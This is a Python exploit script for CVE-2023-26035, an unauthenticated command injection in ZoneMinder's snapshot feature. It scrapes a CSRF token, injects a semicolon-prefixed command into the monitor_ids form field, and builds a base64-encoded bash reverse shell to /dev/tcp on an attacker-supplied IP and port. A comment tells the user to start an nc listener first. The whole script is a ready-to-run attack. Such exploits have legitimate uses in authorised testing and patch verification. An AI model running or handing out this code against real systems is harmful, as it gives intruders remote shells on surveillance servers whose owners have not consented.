ZoneMinder Snapshots < 1.37.33 - Unauthenticated RCE - CVE-2023-26035

import argparse
import base64
import re

import requests
from bs4 import BeautifulSoup
  6.  
# Exploit Title: Unauthenticated RCE in ZoneMinder Snapshots
# Date: 12 December 2023
# Discovered by: @Unblvr1
# Exploit Author: Ravindu Wickramasinghe (@rvizx9)
# Vendor Homepage: https://zoneminder.com/
# Software Link: https://github.com/ZoneMinder/zoneminder
# Version: releases prior to 1.36.33 and prior to 1.37.33
# Tested on: Arch Linux, Kali Linux
# CVE: CVE-2023-26035
# Github Link: https://github.com/rvizx/CVE-2023-26035
  17.  
  18.  
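class ZoneMinderExploit:
    """Drive CVE-2023-26035 against a single ZoneMinder instance.

    The ``view=snapshot&action=create`` handler accepts monitor ids from an
    unauthenticated POST and, in affected versions, splices them into a
    shell command line; a value beginning with ``;`` therefore runs an
    arbitrary command.  The handler is still guarded by csrf-magic, so a
    valid ``__csrf_magic`` token is scraped from the index page first.
    """

    # csrf-magic tokens the target emits look like ``key:<40 hex chars>,<unix time>``.
    _TOKEN_RE = re.compile(r'^key:[a-f0-9]{40},\d+')

    def __init__(self, target_uri, *, timeout=15.0):
        """
        Args:
            target_uri: base URL of the ZoneMinder web UI (e.g. ``http://host/zm``).
            timeout: seconds to wait for each HTTP response.  Without one the
                script can hang forever, since a non-terminating payload such as
                a reverse shell presumably keeps the POST open on the server side.
        """
        self.target_uri = target_uri
        self.csrf_magic = None
        self.timeout = timeout

    def _index_url(self):
        """Return the ``index.php`` URL, tolerating a trailing slash on target_uri."""
        return f"{self.target_uri.rstrip('/')}/index.php"

    @classmethod
    def _is_valid_token(cls, token):
        """Return True if *token* is a string of the csrf-magic ``key:`` shape."""
        return isinstance(token, str) and cls._TOKEN_RE.match(token) is not None

    def fetch_csrf_token(self):
        """Fetch the index page and store its ``__csrf_magic`` token.

        Returns:
            True when a 200 response carried a token of the expected shape
            (left in ``self.csrf_magic``), False otherwise.  Connection errors
            and timeouts are reported and mapped to False rather than raised.
        """
        print("[>] fetching csrf token")
        try:
            response = requests.get(self.target_uri, timeout=self.timeout)
        except requests.RequestException as exc:
            print(f"[!] request failed: {exc}")
            return False
        # Only a successful page is worth parsing; error pages have no form.
        token = self.get_csrf_magic(response) if response.status_code == 200 else None
        if not self._is_valid_token(token):
            print("[!] unable to fetch or parse token.")
            return False
        self.csrf_magic = token
        print(f"[>] received the token: {token}")
        return True

    def get_csrf_magic(self, response):
        """Extract the value of the ``__csrf_magic`` hidden input from *response*.

        Returns None when the page has no such input (e.g. the URL is not a
        ZoneMinder index page) instead of raising AttributeError.
        """
        field = BeautifulSoup(response.text, 'html.parser').find('input', {'name': '__csrf_magic'})
        return field.get('value') if field is not None else None

    @staticmethod
    def _snapshot_form(cmd, csrf_magic):
        """Build the form body for the vulnerable snapshot/create action."""
        return {
            'view': 'snapshot',
            'action': 'create',
            # The leading ';' terminates the monitor id in the server-side
            # command line, so everything after it runs as its own command.
            'monitor_ids[0][Id]': f';{cmd}',
            '__csrf_magic': csrf_magic,
        }

    def execute_command(self, cmd):
        """POST *cmd* through the injection point.

        Requires ``self.csrf_magic`` to have been set by fetch_csrf_token.
        A read timeout is reported as "sent" rather than as a failure: if the
        target runs the command synchronously, a payload that never exits
        (a reverse shell) would keep the request open past any timeout.
        """
        print("[>] sending payload..")
        form = self._snapshot_form(cmd, self.csrf_magic)
        try:
            response = requests.post(self._index_url(), data=form, timeout=self.timeout)
        except requests.ReadTimeout:
            print("[>] payload sent (no response before timeout; check your listener)")
            return
        except requests.RequestException as exc:
            print(f"[!] failed to send payload: {exc}")
            return
        print("[>] payload sent" if response.status_code == 200 else "[!] failed to send payload")

    def exploit(self, payload):
        """Fetch a CSRF token and, only if that succeeds, fire *payload*."""
        if not self.fetch_csrf_token():
            return
        print("[>] executing...")
        self.execute_command(payload)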
  47.  
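def build_reverse_shell_payload(local_ip, port):
    """Return a shell one-liner that opens a bash reverse shell to local_ip:port.

    The interactive bash redirect is base64-encoded and decoded on the target,
    so none of its ``>``, ``&`` or ``/`` characters have to survive the
    server's command line unescaped.  *port* may be an int or a string.
    """
    listener = f"bash -i >& /dev/tcp/{local_ip}/{port} 0>&1"
    encoded = base64.b64encode(listener.encode()).decode()
    return f"echo {encoded} | base64 -d | /bin/bash"


def main():
    """Parse the command line, build the payload and run the exploit."""
    parser = argparse.ArgumentParser(
        description="CVE-2023-26035: unauthenticated command injection in ZoneMinder snapshots")
    parser.add_argument('-t', '--target-url', required=True, help='target url endpoint')
    parser.add_argument('-ip', '--local-ip', required=True, help='local ip')
    parser.add_argument('-p', '--port', required=True, type=int, help='port')
    args = parser.parse_args()
    # The port is interpolated into a shell command on the target; reject
    # anything that is not a real TCP port before it gets there.
    if not 1 <= args.port <= 65535:
        parser.error(f"port must be between 1 and 65535, got {args.port}")
    # Start the listener (e.g. ``nc -lvnp PORT``) before running this.
    payload = build_reverse_shell_payload(args.local_ip, args.port)
    ZoneMinderExploit(args.target_url).exploit(payload)


if __name__ == "__main__":
    main()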
  61.            